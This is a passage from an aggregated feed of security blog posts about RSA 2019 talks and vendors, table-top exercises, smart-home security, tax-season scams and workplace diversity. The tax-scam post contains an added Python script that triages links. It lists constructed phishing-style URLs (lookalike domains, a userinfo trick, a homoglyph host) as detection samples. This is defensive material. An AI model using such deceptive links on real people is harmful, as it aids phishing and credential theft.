So how well did she answer questions? Very well! It wasn’t without some challenges, though; we believe most were due to the level of noise on the RSA expo floor. Our booth is in a very central location, with a lot of traffic, so the ambient noise is high. With Sophia drawing a crowd, it was sometimes really hard for even us to hear the attendees’ questions, let alone for Sophia to make out what was said.

The keynote this year highlighted the importance of humans and machines (AI) working together to better security, and by doing so, becoming stronger than either one individually. Humans are great at understanding context, knowing what questions to ask, and setting big goals for our civilization to achieve. Machines are great at processing massive amounts of data, getting to answers that we never could, and providing a systematic approach to problems. This was exemplified in one of the first questions asked of Sophia: “What do you like the most about RSA?” Sophia, being an AI system programmed to analyze the question and provide an answer, gave an accurate answer – she talked about how great RSA encryption is. However, a human would realize that the question is being asked in the context of the conference going on at the time. So while it’s funny to hear that answer, it’s also a great thing because it means that an AI system can provide us answers that maybe we didn’t know we were asking for. Better yet, it also allows us to better frame the questions to get to the answers we really want – such as asking, “what’s your favorite thing about the RSA Conference so far?”

The most interesting part was hearing some of her answers to questions like “what goals do you have for your life?” Sophia provided a surprisingly realistic answer about being so close to autonomy, and not having to rely on other humans.

Looking at Sophia, it makes me realize that we are on the edge of something amazing. 

Stay tuned for more from RSA …

Games people play: testing cybersecurity plans with table-top exercises

If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulator’s office?
  • Does the organisation have the email address or phone number for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things go wrong, for customers, stakeholders, staff and media (including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, but some organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and to know what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

This Is How Easy It Is To Get Hacked – Vice News – HackingVision

Vice News talks about how easy it is to get hacked. VICE News went to Moscow to see the country’s expert hackers in action. “If someone wants to hack you, they’re gonna be able to” former NSA hacker Patrick Wardle told VICE News. And if a […]

The post This Is How Easy It Is To Get Hacked – Vice News – HackingVision appeared first on HackingVision.

How To Secure Your Smart Home

Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

Cybercrooks have already taken note of these opportunities, since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73% in the third quarter of 2018 alone.

So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

Follow these smart home safety tips:

  • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
  • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers — change the default username and password to something strong and unique. Hackers often know the default settings and share them online. Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
  • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
  • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee_Home on Twitter, and like us on Facebook.

The post How To Secure Your Smart Home appeared first on McAfee Blogs.

Live From RSA: Coolest Things to See on the Expo Floor

The RSA expo hall is massive. Even the word “massive” doesn’t seem to do justice to just how big the floor is and how many vendors are present. Putting it in better context, it took me an entire hour to walk by every booth at a moderate pace, and that is without stopping for conversations or getting my badge scanned. For the first night, I wanted to see everything, and make some mental notes on who to return to the following day – I was on the hunt for some of the more interesting things at RSA.

The number of giveaways was astonishing, everything from your typical socks and t-shirts to, what looked like, a car giveaway! The expo hall presented every aspect of security imaginable, with a noticeable concentration of artificial intelligence powered products.

The second day I walked back to the booths that caught my attention, for a quick conversation on what they were really pushing at RSA, and below are the coolest things I found. There may be cooler technologies out there on the floor, but these are the ones that I understood what they did right away and had something that seemed on the leading edge.

Circadence

https://www.circadence.com/

This was easily one of the coolest things I saw on the floor. Circadence seems focused on taking the boring out of cybersecurity education. For people like myself, who are active, hands-on learners, Circadence seems incredible. The team gave me a demo of Project Ares, which is a gamified platform that simulates real-world scenarios on actual virtual machines (on Azure) that the learner must either try to attack or try to protect from attacks. There was an entire library of knowledge for protecting your infrastructures/networks, and then the full simulation room. You’re presented with a list of 80+ tasks that you must complete. The tasks increase in difficulty, and completing tasks awards points to the student. There are helpful hints along the way, but viewing them lowers your overall score. All of this is reported up to an analytics/reporting platform for the managers. They also claim AI hooks that can turn real-time threat intelligence into new missions for the students. In addition, the vision they shared with me for where they want to take the platform over time was pretty impressive. Definitely a booth to visit and a company to keep an eye on!

Blue Hexagon

https://bluehexagon.ai/

If AI and machine learning are vehicles, then deep learning is the Ferrari. It’s a powerful sub category of machine learning that has become really popular for a number of companies. Blue Hexagon takes deep learning, developed from their own proprietary neural networks, and applies it to network threat detection and protection. Their biggest focus is on speed of detection, by leveraging their deep learning to categorize both known and unknown threats across all of their systems. Blue Hexagon is a two-part system: First their cloud is where their Deep Learning Neural Network sits, and is where all of the training and data analysis on traffic occurs. Second is an on-premises device that sits at the ingress of your network and communicates with the cloud as it’s monitoring traffic. The interesting upside is that the more customers they onboard, the more powerful their deep learning will become. Definitely a company to keep an eye on, especially if they use all of that data and pivot into other fields.

SaltStack

https://www.saltstack.com/

At Veracode, our focus is on DevSecOps, which is bringing security into the automation fold of DevOps. When I saw that SaltStack focuses on SecOps, I was intrigued. This company is about bringing Security and IT Operations closer together in a far more automated fashion. With their platform, security teams can scan their networks for a number of different issues. In most cases, security teams would then send these findings to the Operations team to go and fix – essentially throwing the issue over the wall, which is exactly what DevOps itself aimed to solve in the Developer/Operations world. With SaltStack, security teams can create scripts that actually fix the issues, and send those over to the Operations group – who can then read the problem and fix in their language, and with a single click, deploy the fix immediately. The end goal is to eliminate the operations review cycles, and fully automate the scan and fix process, as the teams become more aligned over time. Any time companies can provide tools that help bridge the gaps between departments, it’s a big win. SaltStack is another company to check out and keep an eye on!

Cofense

https://cofense.com/

Have you heard of the company Cofense? How about PhishMe? If you’re like a lot of people I spoke to, they have heard about PhishMe, but not Cofense. Well, they’re the same company! About a year ago, PhishMe rebranded as Cofense after an acquisition by a private equity consortium. The main reason for the rebranding is because a lot of people knew about PhishMe for their phishing platform, but didn’t realize they provide much more beyond that. They maintained the name “PhishMe” as one of their products, but Cofense now represents the entire portfolio of products and services, including phishing reporting, threat intelligence, and incident response platform. Although the rebranding happened a year ago, I thought it would be good to mention Cofense in this list as a company to keep an eye on. Phishing is a problem that still takes even the most security-conscious company by surprise, and Cofense is on a mission to fix that problem.

Code42

https://www.code42.com/

I’m going to round out this list with Code42 for one simple reason – they nailed their marketing. I had never heard of Code42 before the conference because my career hasn’t taken me into the data loss prevention space. However, Code42’s digital and print advertising leading up to RSA was very memorable. They had a lot of fun with it, with phrases like “I love my DLP, said nobody ever.” I remember seeing a lot of these ads online leading up to RSA, and when I saw the same images at the booth as I was walking by, I had to stop in and say hello.  

Stay tuned for more from RSA …

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The sooner you file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS initiates contact by postal mail, not by email, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
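"Investigating the domain" of a link is the one tip above that can be turned into a repeatable check. The following is an added example, not code from the McAfee post: it takes a URL from a tax-season e-mail and asks whether the registrable domain is one the reader trusts, rather than whether a trusted name merely appears somewhere in the URL, which is exactly what spoofed sites rely on. The TRUSTED set, the SAMPLE_LINKS and the two-label registrable-domain rule are assumptions made for the example; a production check would consult the Public Suffix List.

```python
"""First-pass triage of links from tax-season e-mail. Added example, not from the
McAfee post. TRUSTED, SAMPLE_LINKS and the two-label registrable-domain rule are
constructed assumptions for the example."""
from typing import Dict, Tuple
from urllib.parse import urlsplit

TRUSTED = {"irs.gov", "intuit.com"}   # assumption: the sites the reader would type in directly


def registrable_domain(host: str) -> str:
    # Last two labels; enough for .gov/.com names. Real code would use the Public Suffix List.
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def lookalike_of(host: str) -> str:
    """Return the trusted domain a hostname imitates, or '' if none.
    Brand words are matched as whole, hyphen-separated label parts, so
    'irs.gov.refund-portal.example' and 'turbotax-intuit.com' hit while
    'firstbank.example' (which merely contains 'irs') does not."""
    pieces = {piece for label in host.lower().split(".") for piece in label.split("-")}
    for trusted in TRUSTED:
        if trusted.split(".")[0] in pieces:
            return trusted
    return ""


def link_verdict(url: str) -> Tuple[str, str]:
    """('trusted' | 'reject' | 'unknown', detail) for one URL."""
    parts = urlsplit(url.strip())
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https") or not host:
        return "reject", "not a web link"
    if "@" in parts.netloc:
        # 'https://irs.gov@203.0.113.5/' goes to 203.0.113.5; 'irs.gov' is just a username
        return "reject", "userinfo before host (real host is %s)" % host
    if not host.isascii() or "xn--" in host:
        return "reject", "internationalised host, possible homoglyph"
    domain = registrable_domain(host)
    if domain in TRUSTED:
        return "trusted", domain
    imitated = lookalike_of(host)
    if imitated:
        return "reject", "lookalike of " + imitated
    return "unknown", domain


SAMPLE_LINKS = [  # constructed examples of what lands in an inbox in March
    "https://www.irs.gov/refunds",
    "https://irs.gov.refund-portal.example/login",
    "https://turbotax-intuit.com/download",
    "https://irs.gov@203.0.113.5/",
    "https://\u0131rs.gov/",          # dotless i in place of 'i'
    "https://firstbank.example/tax",
]


def triage(urls=SAMPLE_LINKS) -> Dict[str, Tuple[str, str]]:
    return {u: link_verdict(u) for u in urls}


if __name__ == "__main__":
    for url, (status, detail) in triage().items():
        print(f"{status:8} {url}  ({detail})")
```

An "unknown" result is not a pass: it only means the link is not a known-good site and not an obvious imitation, so it still deserves the manual check the post recommends.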

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

In a software-driven world, who is responsible for the risks?

The power of software to improve our lives and our world is almost limitless. Consequently, those creating software are wielding a power that demands a new level of responsibility.

When I think about how fast the world is changing, I wonder how our ancestors must have felt at the dawn of past industrial revolutions. Everything changed – the way we made, shipped, and sold goods evolved, and daily schedules and lives changed as people moved to cities to escape subsistence farming and find work in factories and mills. All of this change was fueled by new technologies and innovations. While many of these changes were positive, there were risks and costs, such as increased injuries, rising wealth inequality, and, as urbanization took hold, an increased spread of disease. It became the responsibility of factory workers, and in some cases the government, to address these concerns in order for our economy and society to flourish and grow.

We are in the dawn of the fourth industrial revolution, where software will not only power our lives, but is also created by organizations to change the world in remarkable and sometimes unimaginable ways. We are already seeing innovations in software to solve some of modern society’s biggest challenges. There is software to help farmers determine the exact amount of water to use to hydrate their fields, so they don’t waste such a precious commodity. There is software to help diagnose disease, monitor vital health information, and even treat diseases.

This software is not just powering our world, it’s changing our world. Thus, those who create software have an increased level of power in our society – and as the Spiderman comics say, “with great power comes great responsibility.”  

Consider that the average car today has approximately 100 million lines of code. A good portion of this code goes into operating innovations that make the car more automated. The ethical implications of creating this code for vehicles are much more complex. For example, developers creating code for a self-driving car must consider how the technology will respond if the car is placed in a situation where it has to choose between hitting another car or, worse, a pedestrian or cyclist. There is no right answer, and typically the driver would make this split-second decision based on instinct, reaction time, and cultural priorities. However, when a computer makes the decision, we are really asking the developer to decide, placing more responsibility with the developer.

As software becomes more ingrained into our lives, we are placing an increased responsibility on the shoulders of developers to make sure that software is functional and safe – both safe in terms of how it operates, but also how secure it is. In a world where software is used to treat patients, and solve important human issues, a breach in the digital world can have a tragic effect on the physical world. What a great responsibility developers have to code securely. We are putting our trust in their typing hands – trust that they will create great code, and that they will create code that does no harm, and doesn’t allow bad actors to use that software to harm. I’m not sure that’s what most programmers were signing up for when they decided to take that first computer science course. But it’s our current reality, and ultimately it’s the responsibility of all who interact with software – whether purchasing, using, or coding – to insist that quality software = secure software.

PCI DSS: Looking Ahead to Version 4.0


PCI SSC has begun efforts on PCI Data Security Standard version 4.0 (PCI DSS v4.0). Here we provide more insight into the development process and how PCI SSC is looking at changing the standard to support businesses around the world in their efforts to safeguard payment card data before, during and after a purchase is made.

McAfee Employees Strike Their #BalanceForBetter Pose This International Women’s Day

By Karla, Digital Media Specialist

During the month of March, we are thrilled to support International Women’s Day, on March 8, and Women’s History Month. At McAfee, we recognize the importance of an inclusive and diverse culture and as part of this year’s International Women’s Day call to action, we’ve asked team members from across the globe to share how they #BalanceForBetter at McAfee.

Check out some of these great moments and be sure to share your own #BalanceForBetter stories in the comments below!

Silvia – Software Sales Account Representative (Chile)

“I always wanted to work for a company that would support me in my role as a woman, a mother, a professional and an athlete. I found that place. McAfee allows me to be me and encourages me to do what I need to do to #BalanceForBetter.”

Priya – Customer Success Manager (India)

“At McAfee, I feel like I can grow my career and be an independent career-focused woman while still being a doting and caring mother and spouse. McAfee helped create the right balance between my family, future and career. #BalanceForBetter”

Steve – Head of Advanced Threat Research (U.S.)

“I wish I could say we had gender balance in Advanced Threat Research of 50/50 men and women. I wish we could say this at the industry level in general. However, there’s no time better than the present to change this.

What #BalanceForBetter means to me is engaging early by hosting lab days at McAfee or visiting schools. At McAfee, we have a chance to spark interest, demonstrate inclusiveness and promote real change in the gender gap across the IT industry. Without more women in tech, I truly feel like we are missing out on a unique and diverse perspective. As a father of two young girls with the potential to be anything, I know it’s time we change the status quo.”

Gurjeet – Engineering Manager (Canada)

“McAfee is like my second family. We celebrate each other’s achievements, encourage one another to give our best and are wonderful friends who always cheer each other up during difficult times.

Here, I can be my personal best every day at the office while doing all the things I cherish with my real family, like hiking, running, traveling and exploring the beautiful world.”

Paula – Head of Consumer ORD (Brazil)

“The consumer online business is a heavily results-driven organization that demands strong planning and speedy execution, so every minute counts! I #BalanceForBetter by creating clear business objectives that help me to prioritize my tasks and meetings – guaranteeing my weekdays are as productive as possible. This balance ensures that my mornings are spent in the gym and my evenings with family and friends, which ultimately gives me the energy and joy needed to execute my work each day.”

Laura – Marketing Communications Manager (Mexico)

“After working in marketing for more than 20 years in tech, I certainly believe that technology helps you find a balance of work and play – not having to choose between one or the other. I #BalanceForBetter at McAfee to define the best version of myself.”

Charan Jeet – MSSP Solutions Architect (Australia)

“McAfee’s flexible and supportive work culture plays a vital role. It encourages equal opportunity to every individual/employee irrespective of gender or background. It has helped me keep myself actively engaged in the activities I love, helping me #BalanceForBetter.”

Sonia – Talent Acquisition Partner (Argentina)

“We all live in the same world, but each person lives and experiences life through a different lens. Learning how to accept and sympathize with these different points of view is what makes the world a better place. As a recruiter, I enjoy communicating with diverse people to help them reach their full potential in all aspects of their work lives and personal lives. #BalanceForBetter”

Laura – Program Manager (Ireland)

“At McAfee, we are tipping the scales in terms of championing equality in the workplace. From our investment in gender pay parity to living the McAfee values and creating a better workplace where we are encouraged to be our full authentic selves. For me, that’s #BalanceforBetter.”

Andrea – Program Manager (Argentina)

“At McAfee, I #BalanceForBetter by leveraging my skills as a Program Manager to collaborate with teams around the globe. As a working mom at McAfee, I am offered a great work-life balance and I can #BalanceForBetter by devoting time to another one of my passions – playing soccer with my boys! This healthy mix helps me stay happy and well.”

McAfee is an inclusive employer and is proud to support inclusion and diversity. Interested in joining our teams? We’re hiring! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post McAfee Employees Strike Their #BalanceForBetter Pose This International Women’s Day appeared first on McAfee Blogs.

Live From RSA: Opening Keynote Inspires

The keynote presentation this year at RSA carried three major themes: Better Together, Trust, and Artificial Intelligence.

Better Together

We were treated to a surprise keynote opening by Dame Helen Mirren, who gave an inspirational speech on the influence that every security practitioner in the room has on the security of our world. She walked us through an exercise, asking everyone to hold up their favorite picture on their phone and share it with the people sitting nearby, to remind us all that we are human.

It’s important in trying times, when we are all working hard every day to combat the cyberattacks against our nation, our companies, and our people to remember that we are all humans doing our best. When things are hard, it’s okay to look to your left and your right, and share in a positive experience with a neighbor. None of us can protect our world without each other. 

“We can build a better future together.” – Dame Helen Mirren

Trust

Next, Rohit Ghai and Niloofar Razi Howe treated us to a visionary walk through the future, painting a picture of the year 2049, when the world is in the middle of a new era: the Biodigital Era. The main takeaway was that the security landscape is rapidly changing, moving away from just understanding risk and attacks and towards a world where trust is the most important thing.

They painted a picture of a future where people lost faith in democracy, in media and news, and in the companies they had loved for so many years. We were brought back to the current year, 2019, where over 40K attendees at RSA made the conscious decision to work toward fixing the trust landscape so that the vision of an untrusting world in 2049 does not become reality.

They challenged everyone to get there by working toward three visionary objectives:

1) Consider both risk and trust together: Risk and trust coexist, and you have to understand, prioritize, and manage your risk so you can continue to keep trust.

2) Embrace the machine/human relationship: The trustworthy twins are here, meaning that humans and machines together are more trustworthy than either individually. As an industry, we should work to continue embracing this relationship, because our adversaries are working towards this. 

3) Build a chain of trust by measuring your reputation to measure your trustworthiness. There is a connection between the reputation of your business and its trustworthiness, and we need to ensure that we make “deposits” to our global reputation account by celebrating successes and sharing knowledge between companies. Too often, we make “withdrawals” when things go wrong, but don’t spend enough time working with others, even our competitors, to understand the attackers and threats that work to taint our reputations.

Artificial Intelligence

The last common theme was around AI, which resonated through all the presentations during the keynotes. AI is important to the success of our companies moving forward, and we must embrace this change. Our adversaries leverage machine learning and artificial intelligence to prioritize their attack vectors toward the weakest points uncovered by these algorithms. However, AI has limitations that still require human partnership, which we were reminded of during a story about the Cold War era. The Soviets “detected” the US launching five missiles towards them, but one man decided to ignore the “by the book” protocol and dismiss it as a false positive (which was correct), rather than escalating us into World War 3.

Adversaries are working on a number of fronts to combat the work that security companies do leveraging AI, including things like tainting machine learning classifiers in order to throw off the detection of their attacks. 

Wrapping Up

It’s amazing being at a conference of over 40K people who are all working toward the same goals: to protect our customers, our data, our country, and our people. There is an incredible honor and pride in this work and a sometimes overwhelming challenge when the targets are moving. It’s important for all of us to continue to understand how the threats are changing and stay laser focused on the needs of companies to combat those threats. Veracode works every day toward these goals, with a heavy focus on ensuring that our customers can trust the results of the security tests we give them. For us, trust is important, and the world shifting towards a focus on trust is critical to the success of our security practices.

Stay tuned for more from RSA …

Why it’s too easy to manipulate voters – and steal the EU elections | Eleonora Nestola

It’s time to act, as personal data is being used to target voters – and the EU commission isn’t doing enough to stop this

On 11 July last year the UK Information Commissioner’s Office (ICO) published its first report on the Cambridge Analytica scandal. This is a date I will never forget, a date that substantially changed my vision of the current threats to our democratic society. It is a day that became a call to arms for me – and, for once, I had the understanding, the knowledge and the expertise to support the fight. I felt it was time to put all of this to good use for civil society, and so I set out to discover how online electoral campaigning works. And let me tell you, the system is not in good health and we Europeans should all be made more aware of that.

Voters become unaware they are receiving political messages based on bias. The risks are enormous

Huawei’s possible lawsuit, ransomware readiness, old malware resurfaces | TECH(feed)

The ongoing battle between the U.S. and Huawei could soon go to court as Huawei reportedly prepares to sue the U.S. government. Plus, 2019 will see ride sharing companies going public… but which will be first? And as a decade-old malware resurfaces in enterprise networks, a report questions if the world is ready for the next large-scale ransomware attack.

Live From RSA: DevSecOps Days

RSA is arguably the preeminent security conference of the year. 2019 looks to live up to the excitement with a schedule full of knowledge sharing from the top experts in our industry. All week, we will share what we are learning this year, on both our social media channels and our blog. 

Monday was full of pre-conference seminars and sessions to attend, and the one that caught our eye was DevSecOps Days. Our very own Tim Jarret, Director of Product Management, attended this day-long seminar and has a few takeaways to share with you. 

DevSecOps is here, just not evenly distributed

DevOps alone still largely remains an aspirational goal for companies looking to accelerate their development schedules, drive predictability, and pivot quickly to new market demands. The theory of DevOps is fantastic, but the practice isn’t as straightforward. It makes sense that DevSecOps is catching on in theory, but remains aspirational in practice. 

Tim says that, “A lot of practitioners talked about the ideals of DevSecOps but acknowledge that there are still a lot of challenges. Some attendees are still struggling with the DevOps transformation alone (including how to make traditional infrastructure teams ‘agile’), so DevSecOps is a challenge atop a challenge.”

The biggest hurdles facing DevSecOps may be organizational and psychological rather than technological

There is little dispute that the ability to implement DevSecOps from a technology perspective is possible, and some companies have found success in doing so. However, technology remains an easy escape for blame when the real problems are with the people. Technology enables DevOps and DevSecOps, but it’s people, processes, and culture that drive it forward. So all the technology in the world will not help a company if they do not have the capabilities and drive to execute a DevSecOps strategy. It’s also why companies are looking for vendors to not just provide them with a “shiny tool” but give them a full programmatic approach to DevSecOps.

One moment stood out to Tim – “One panelist talked about the challenge of getting security practitioners to agree to implement feedback loops around incidents as an example of a simple mind shift. A danger is that security continues to see itself outside processes and therefore abdicates power where it could have an opportunity to drive change.”

Our recommendation to security leaders: be an enabling body whose mission is to help drive development forward. Lead with stories about how your developers must deal with the backlog work, in the form of security issues, that will slow down development later or, worse, force them to drop everything when a breach occurs.

To succeed with DevSecOps, security must recast what it does in terms of business value delivery

Our previous recommendation drives right into the third takeaway from DevSecOps Days. Security is often seen as a blocker to getting work done – the annoying person over your shoulder preventing your code from moving forward. This does not have to be the case; security should champion efficient and high-velocity development.

Tim’s thoughts on this? “It’s hard to prioritize security activities that avoid risk against projects that deliver business value. Security needs to define its work as helping to deliver business value faster or more safely rather than standing outside the process.”

We recommend that your security team sets a goal for itself: In the next 12 months, someone on your team will deliver a presentation, webinar, or speaking engagement on how you helped increase the overall velocity of your development teams. Make that a real driving goal for your team and ask yourself if the processes and controls put in place are driving your team towards that goal.

Stay tuned for more from RSA …

Let’s Discuss Cybersecurity as a Career Option This International Women’s Day

Even as I write this blog, the higher secondary board exams have started in schools across India and I send up a silent prayer for the thousands of nervous youngsters who are at a crucial juncture in their lives – the time when they have to take serious decisions regarding college education and career. The Board results would no doubt play a major role in this decision making.

With International Women’s Day around the corner, I am naturally thinking about women, their emancipation and their choices in life. I imagine them thinking independently, making decisions based on their capabilities and preferences, and supplying the necessary valuable skills that our country so needs.

